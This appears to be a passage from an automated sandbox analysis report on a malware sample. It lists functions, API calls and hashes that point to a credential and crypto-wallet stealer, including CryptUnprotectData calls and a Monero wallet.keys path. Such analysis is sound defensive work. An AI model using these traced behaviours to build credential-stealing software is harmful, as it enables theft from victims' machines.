                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: :Fy$a<}>$c4X$cc}$;Vl
                          • API String ID: 0-57280250
                          • Opcode ID: 81ea2cf99e3304e3a5f9f0dffca6844f18d6d9346c9abf1d30e0d88d2207e270
                          • Instruction ID: 03aa335405bf26646b303e31699be220fe5a3e238a6c2e4acfe68df105dec4df
                          • Opcode Fuzzy Hash: 81ea2cf99e3304e3a5f9f0dffca6844f18d6d9346c9abf1d30e0d88d2207e270
                          • Instruction Fuzzy Hash: 8DB2E5F3908210AFE3046E29EC8576AFBE5EF94760F1A493DEAC8D3744E63558018797
                          Function 00BFC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BFC871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BFC87C
                          • lstrcat.KERNEL32(?,00C10B46), ref: 00BFC943
                          • lstrcat.KERNEL32(?,00C10B47), ref: 00BFC957
                          • lstrcat.KERNEL32(?,00C10B4E), ref: 00BFC978
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: 1893c2db83a14ac7cf01c7ea4de4ea9d19941bb204407e071f5f5342b59f4f39
                          • Instruction ID: 6f324b5c154fac7970030c795894381cdb3412f412e6f0049f299497ed9f2e5f
                          • Opcode Fuzzy Hash: 1893c2db83a14ac7cf01c7ea4de4ea9d19941bb204407e071f5f5342b59f4f39
                          • Instruction Fuzzy Hash: 6C413D7590421D9FCB10DFA4CD89BFEBBB8AB44304F1481B8E609A7280D7B55AC8CF91
                          Function 00BF7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00BF724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00BF7254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00BF7281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00BF72A4
                          • LocalFree.KERNEL32(?), ref: 00BF72AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: 22f056cc1f5c1fa9d42270333d7bffda07d6efd60d8372d2fe991bfd5832629d
                          • Instruction ID: 5ed819081fcfbb5e33c064b9c76fa6a925c39d2d00b2353c3a31b173a535d619
                          • Opcode Fuzzy Hash: 22f056cc1f5c1fa9d42270333d7bffda07d6efd60d8372d2fe991bfd5832629d
                          • Instruction Fuzzy Hash: E30100B5A40208BFDB14DBD4DD4DFAD7BB8EB44700F144199FB05BB2C0DAB0AA448B65
                          Function 00C09600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C0961E
                          • Process32First.KERNEL32(00C10ACA,00000128), ref: 00C09632
                          • Process32Next.KERNEL32(00C10ACA,00000128), ref: 00C09647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 00C0965C
                          • CloseHandle.KERNEL32(00C10ACA), ref: 00C0967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: 1c36fcdcf98920a33efb0d0733eedecce2557b36e991d1375911649901a5a259
                          • Instruction ID: 9dc8087a60ae7e235553bd7ec50c58618db6a69d3ab1e1d0b9fcf74e03a06ccf
                          • Opcode Fuzzy Hash: 1c36fcdcf98920a33efb0d0733eedecce2557b36e991d1375911649901a5a259
                          • Instruction Fuzzy Hash: 46010C75A00208AFCB54DFA6CD8CBEDBBF8EB48700F144199B945A6290DB759B84CF51
                          Function 00FA9190 Relevance: 6.7, Strings: 4, Instructions: 1653COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: /*N3$DKf6$c|}=$eX9
                          • API String ID: 0-4089870414
                          • Opcode ID: a803307fd72b188cbc060a500fce4828f800dd97576b7273d5c6169b4b42f799
                          • Instruction ID: 2195bec1fc1f40f1885c7c3c024be4fa1b26f0f4b850f55aca85c731ebfed4d0
                          • Opcode Fuzzy Hash: a803307fd72b188cbc060a500fce4828f800dd97576b7273d5c6169b4b42f799
                          • Instruction Fuzzy Hash: 33B2F7F3A0C2049FE304AE2DEC8567AFBE9EF94720F16463DEAC4C7744E63558058696
                          Function 00FA76F0 Relevance: 6.6, Strings: 4, Instructions: 1590COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 'y|$Al@$`L{$l~k
                          • API String ID: 0-3583029365
                          • Opcode ID: 7a76e09c098b3246b9af2d945a45c73514f5f5aaf1cfe4f784bd428e4512742b
                          • Instruction ID: 9c64ed7991aeeb2a278a1f308d27655ba576a6d69052d510f89c69d389942201
                          • Opcode Fuzzy Hash: 7a76e09c098b3246b9af2d945a45c73514f5f5aaf1cfe4f784bd428e4512742b
                          • Instruction Fuzzy Hash: 36B205F3A0C2049FE704AE2DEC8577ABBE9EF94320F16493DEAC5C7744E63558018696
                          Function 00C08680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00C105B7), ref: 00C086CA
                          • Process32First.KERNEL32(?,00000128), ref: 00C086DE
                          • Process32Next.KERNEL32(?,00000128), ref: 00C086F3
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • CloseHandle.KERNEL32(?), ref: 00C08761
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: c985941b7e76e6770791d5c7cf00f50d03567d33a5b1372a1cde05eed73c8295
                          • Instruction ID: f1f0e01ba1b6226ba9bbedd6a28675ac31fcc4166baa463d2ad9f5be696124f4
                          • Opcode Fuzzy Hash: c985941b7e76e6770791d5c7cf00f50d03567d33a5b1372a1cde05eed73c8295
                          • Instruction Fuzzy Hash: 9D315C71911218ABCB24DF55CC45FEEB778EF45700F1082A9F10AA21E0DF706A89CFA1
                          Function 00C08EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00BF5184,40000001,00000000,00000000,?,00BF5184), ref: 00C08EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: b0385c63ee470128d3d8d4130dae0bbd2f08da7aa0edec77278efb56c17b2f17
                          • Instruction ID: 281c2c3ed8f1f9cfce962c2476daf4ea457d4897eb3ce17f862881e525802a47
                          • Opcode Fuzzy Hash: b0385c63ee470128d3d8d4130dae0bbd2f08da7aa0edec77278efb56c17b2f17
                          • Instruction Fuzzy Hash: 7B112174200209FFDB04CFA5D889FAB37A9AF89300F14D458F9558B290DB35ED49DB60
                          Function 00BF9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BF4EEE,00000000,00000000), ref: 00BF9AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00BF4EEE,00000000,?), ref: 00BF9B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BF4EEE,00000000,00000000), ref: 00BF9B2A
                          • LocalFree.KERNEL32(?,?,?,?,00BF4EEE,00000000,?), ref: 00BF9B3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: 525a44cb9d9c670529c9539c19375abc6be611a5f275a35378e59de37d84cf8c
                          • Instruction ID: b12dfb2f3f7b3917a21fdbe489819a4333f1197e4eaeb7b2f9a1d306e935b0da
                          • Opcode Fuzzy Hash: 525a44cb9d9c670529c9539c19375abc6be611a5f275a35378e59de37d84cf8c
                          • Instruction Fuzzy Hash: 1F11A4B4240208AFEB14CF64DC99FAA77B5FB89700F208098FA159B3D0C775A945CB50
                          Function 00C07980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C10E00,00000000,?), ref: 00C079B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C079B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00C10E00,00000000,?), ref: 00C079C4
                          • wsprintfA.USER32 ref: 00C079F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: fe892864cc32a84297435d3ae766b6895da2fcab8a7f0a1b3f41dc8e827713a7
                          • Instruction ID: 03b22927fc7e5d5bb48377ce7b4d855b17954a6a01bba3c460548d59286f1813
                          • Opcode Fuzzy Hash: fe892864cc32a84297435d3ae766b6895da2fcab8a7f0a1b3f41dc8e827713a7
                          • Instruction Fuzzy Hash: CA112AB2904118ABCB14DFCADD49BBEBBF8FB4CB11F14425AF645A2280D2395944C7B1
                          Function 00C07A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,006EDA90,00000000,?,00C10E10,00000000,?,00000000,00000000), ref: 00C07A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C07A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,006EDA90,00000000,?,00C10E10,00000000,?,00000000,00000000,?), ref: 00C07A7D
                          • wsprintfA.USER32 ref: 00C07AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: b080f7b10b3cae31f8879d082b37d054f0fb314749da36a863ac7179955c692c
                          • Instruction ID: 1410548b20a41150cfdad14f23d47c8008eb9d30189d1320becef4515808ee6e
                          • Opcode Fuzzy Hash: b080f7b10b3cae31f8879d082b37d054f0fb314749da36a863ac7179955c692c
                          • Instruction Fuzzy Hash: 34118EB1E45218EFEB249B55DC49FA9BB78FB04721F1043AAE91AA32C0C7741A84CF51
                          Function 00C03720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.COMBASE(00C0E118,00000000,00000001,00C0E108,00000000), ref: 00C03758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00C037B0
                          Memory Dump Source
